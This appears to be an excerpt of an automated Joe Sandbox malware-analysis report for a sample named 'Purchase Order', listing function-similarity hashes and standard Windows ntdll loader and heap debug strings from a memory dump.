                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 4f548447816520bd484a6c0b33bb0bfef53f57e7a789e9e7c42b1b1ca553ce3f
                                            • Instruction ID: 40fb19aec2832f33532432b440277771d8faae87765fff1879d815b010532c63
                                            • Opcode Fuzzy Hash: 4f548447816520bd484a6c0b33bb0bfef53f57e7a789e9e7c42b1b1ca553ce3f
                                            • Instruction Fuzzy Hash: 57512CB5B0065ABFE741EF98CC9097EF7B8BB442447508369E569D7641D73CDE008B90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 78dd98a9fe0e511f34feca68c7777fd8580c9c54ccd0662759dbc597a8bfd2cc
                                            • Instruction ID: a181ce2b18e8c10c2d3853a68c8ce56a4a650c7a1fabd5475b932efcdd9dc3fa
                                            • Opcode Fuzzy Hash: 78dd98a9fe0e511f34feca68c7777fd8580c9c54ccd0662759dbc597a8bfd2cc
                                            • Instruction Fuzzy Hash: AE512A75A00745AFEB20CF9CCD9097FBBF9EF4A240F40865AE4A5D7641EA74DA40CB60

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: HEAP:
                                            • API String ID: 3446177414-2466845122
                                            • Opcode ID: bc3ec7339f4cb4f8b896ec0852f33d7b40948cbff67bf718776bab58e93062df
                                            • Instruction ID: 535895c336147b372ae0a036f8f4937a964acc94d319947f00ee5e2c35933687
                                            • Opcode Fuzzy Hash: bc3ec7339f4cb4f8b896ec0852f33d7b40948cbff67bf718776bab58e93062df
                                            • Instruction Fuzzy Hash: 48A1CE75B143018FE705CE18D890A5AB7E9FF88B60F444A2DE946DB310EB71EC46CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            • ExecuteOptions, xrefs: 348946A0
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34894725
                                            • Execute=1, xrefs: 34894713
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34894655
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 34894787
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 348946FC
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 34894742
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 7fdd0a4e2eac6c5b6ef5d5f451ddfa92d48ca717d5eb1034daab791ced2c11b7
                                            • Instruction ID: f727168b136349ee6a97467b5ecc55d5e1c7ef4cb23c6c2e3611f91d63fdc4ff
                                            • Opcode Fuzzy Hash: 7fdd0a4e2eac6c5b6ef5d5f451ddfa92d48ca717d5eb1034daab791ced2c11b7
                                            • Instruction Fuzzy Hash: 6451177560021DBFFB10AAA8DC85FE977ECEF08344F4042D9E615A71A0EBB19A45CF51
                                            Strings
                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 34887AE6
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 348879D5
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 348879D0, 348879F5
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 348879FA
                                            • SsHd, xrefs: 3483A3E4
                                            • Actx , xrefs: 34887A0C, 34887A73
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                            • API String ID: 0-1988757188
                                            • Opcode ID: 1ef7b287b5be2e9b72d3a87acb65bed648b19a7a85043ab59f4e52e29a58b41a
                                            • Instruction ID: c368a638488c6bbf17e1dcc4ada1904e0519298e9e715d0d0ad3024a804e8888
                                            • Opcode Fuzzy Hash: 1ef7b287b5be2e9b72d3a87acb65bed648b19a7a85043ab59f4e52e29a58b41a
                                            • Instruction Fuzzy Hash: E7E1B1796093018FE715CF28C884B9AB7E5FB85364F504B2DE865CB290EB31D985CBC1
                                            APIs
                                            Strings
                                            • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34889565
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34889346
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 34889341, 34889366
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 3488936B
                                            • Actx , xrefs: 34889508
                                            • GsHd, xrefs: 3483D874
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                            • API String ID: 3446177414-2196497285
                                            • Opcode ID: bf4431783141b81fc0b598c01ad728e81cf17ad79de5b682079f589909fb674c
                                            • Instruction ID: 1585f8deca1b6d3bda8966c38930f751589fd755d4f48f6288ff7716d615127b
                                            • Opcode Fuzzy Hash: bf4431783141b81fc0b598c01ad728e81cf17ad79de5b682079f589909fb674c
                                            • Instruction Fuzzy Hash: 17E17978609306CFE711CF68C880B5AB7E4BB8835CF404B6DE8959B291D771E949CF92
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 3481656C
                                              • Part of subcall function 348165B5: RtlDebugPrintTimes.NTDLL ref: 34816664
                                              • Part of subcall function 348165B5: RtlDebugPrintTimes.NTDLL ref: 348166AF
                                            Strings
                                            • LdrpInitShimEngine, xrefs: 348799F4, 34879A07, 34879A30
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34879A01
                                            • apphelp.dll, xrefs: 34816496
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 348799ED
                                            • minkernel\ntdll\ldrinit.c, xrefs: 34879A11, 34879A3A
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 34879A2A
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-204845295
                                            • Opcode ID: bf5dbb9a79e2b6710f6ecbd4fb945cebb4f611c6a57e10e02da9cc5ee3924bf7
                                            • Instruction ID: 95aab023302acbca924c82ded46c296d3a06e3c2ea48480c726d3c86c455a341
                                            • Opcode Fuzzy Hash: bf5dbb9a79e2b6710f6ecbd4fb945cebb4f611c6a57e10e02da9cc5ee3924bf7
                                            • Instruction Fuzzy Hash: E9518171219304DFF321CF24C850E9BBBE9EF88754F404A1EE595A7260DA70D985CF96
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                            • API String ID: 3446177414-4227709934
                                            • Opcode ID: b7f610cbb87afb12d8a1fa70b14b1ff7fadee67617dd1a38bdccc9bd9722c9e4
                                            • Instruction ID: 90a0e507da81c3c7b22d6c9159805262e55eba2fef47233eebde1b9c81220c6d
                                            • Opcode Fuzzy Hash: b7f610cbb87afb12d8a1fa70b14b1ff7fadee67617dd1a38bdccc9bd9722c9e4
                                            • Instruction Fuzzy Hash: DF415AB9E0060AAFEB05DF99C980ADEBBF5FF48354F104259EA04AB341D7719951CBA0
                                            APIs
                                            Strings
                                            • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34879AF6
                                            • LdrpLoadShimEngine, xrefs: 34879ABB, 34879AFC
                                            • minkernel\ntdll\ldrinit.c, xrefs: 34879AC5, 34879B06
                                            • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34879AB4
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-3589223738
                                            • Opcode ID: a7d2fe43c53c46088fc6250cc5c2e53adba72f6787248438ca31ad1fb172163b
                                            • Instruction ID: 94c15d8b8889a6126de03debe120e52d653199684b949fa621d465b33ac79379
                                            • Opcode Fuzzy Hash: a7d2fe43c53c46088fc6250cc5c2e53adba72f6787248438ca31ad1fb172163b
                                            • Instruction Fuzzy Hash: BF51F176A003589FFB14DB6CCC54E9D7BB6EB48314F04036AE461BB2A5DBB09C42CB94
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                            • API String ID: 3446177414-3224558752
                                            • Opcode ID: fdfef8d944cae3664e8f3e49e419117aa6bd29922d8120a32583b5397f7b1c84
                                            • Instruction ID: d4d7d5bd2e5e0145cf9325ec2d596f380840ebb0cc92fb8adbb7e92c5cbfbf1b
                                            • Opcode Fuzzy Hash: fdfef8d944cae3664e8f3e49e419117aa6bd29922d8120a32583b5397f7b1c84
                                            • Instruction Fuzzy Hash: C1412775600748DFE702CF68C884B9AB7F8EF49364F108369E5119B791CB74A881CB91
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 348CF250
                                            • RtlDebugPrintTimes.NTDLL ref: 348CF2C5
                                              • Part of subcall function 3481B970: LdrInitializeThunk.NTDLL ref: 3481B989
                                            Strings
                                            • Entry Heap Size , xrefs: 348CF26D
                                            • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 348CF263
                                            • ---------------------------------------, xrefs: 348CF279
                                            • HEAP: , xrefs: 348CF15D
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes$InitializeThunk
                                            • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                            • API String ID: 1259822791-1102453626
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                            • API String ID: 3446177414-1222099010
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$@
                                            • API String ID: 3446177414-1194432280
                                            Strings
                                            • LdrpFindDllActivationContext, xrefs: 34893636, 34893662
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 34893640, 3489366C
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 3489365C
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3489362F
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 3446177414-3779518884
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 3446177414-3610490719
                                            Strings
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 348982DE
                                            • Failed to reallocate the system dirs string !, xrefs: 348982D7
                                            • minkernel\ntdll\ldrinit.c, xrefs: 348982E8
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-1783798831
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 34897BAC
                                            • RTL: Resource at %p, xrefs: 34897B8E
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 34897B7F
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3489728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 348972C1
                                            • RTL: Resource at %p, xrefs: 348972A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 34897294
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            Strings
                                            • LdrpCheckRedirection, xrefs: 348A488F
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 348A4899
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 348A4888
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 3446177414-3154609507
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Wow64 Emulation Layer
                                            • API String ID: 3446177414-921169906
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: f2f779bcd96e67e82a0bfd72759ff767a4b96af8f56fa48329f9e118490721c0
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: A091DB74E00209DFEB90DE59C881AAEB7A5EF44768F504B1EEE56E72C4DB7C89408790
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$Flst
                                            • API String ID: 0-758220159
                                            • Opcode ID: 17978f855661c78c01df65dbda7182e195be06bd6ea1b28c349d2ff679eab276
                                            • Instruction ID: 447e275a19a9e1bc49116223c8d05db0d1bf0359efa409b41dc3a5ed07f27059
                                            • Opcode Fuzzy Hash: 17978f855661c78c01df65dbda7182e195be06bd6ea1b28c349d2ff679eab276
                                            • Instruction Fuzzy Hash: A851E3B5E00608DFEB15CF9AC48479DFBF4EF48B94F14826ED0099B260EB709985CB80
                                            APIs
                                            Strings
                                            • kLsE, xrefs: 34820540
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3482063D
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 3446177414-2547482624
                                            • Opcode ID: 689407ff8103eb5f37b352ba4ea4be331dcf4b1f4a6568ff06c6d5dee3a199e3
                                            • Instruction ID: 8e7fc299eb447e00d258b8ad86b36cdc5211665342d8fa40ef8d1e00c16ba325
                                            • Opcode Fuzzy Hash: 689407ff8103eb5f37b352ba4ea4be331dcf4b1f4a6568ff06c6d5dee3a199e3
                                            • Instruction Fuzzy Hash: 4851B1B55047468FD314DF68C544697B7E4EF86304F004A3EEAEA97240E774D685CF92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0$0
                                            • API String ID: 3446177414-203156872
                                            • Opcode ID: b6b862fd38abd1e8bf48e5f204e9256f92efda0c597db63b13bb0c691a3d5017
                                            • Instruction ID: 4ffecb6f9ecdc13e8adc4e62c9d560ddc355bdd9ad3aa28574a17d1c73c406ed
                                            • Opcode Fuzzy Hash: b6b862fd38abd1e8bf48e5f204e9256f92efda0c597db63b13bb0c691a3d5017
                                            • Instruction Fuzzy Hash: FB415AB66087059FD300CF28C584A1ABBE5BF89758F044A2EF988DB341D775EA05CB96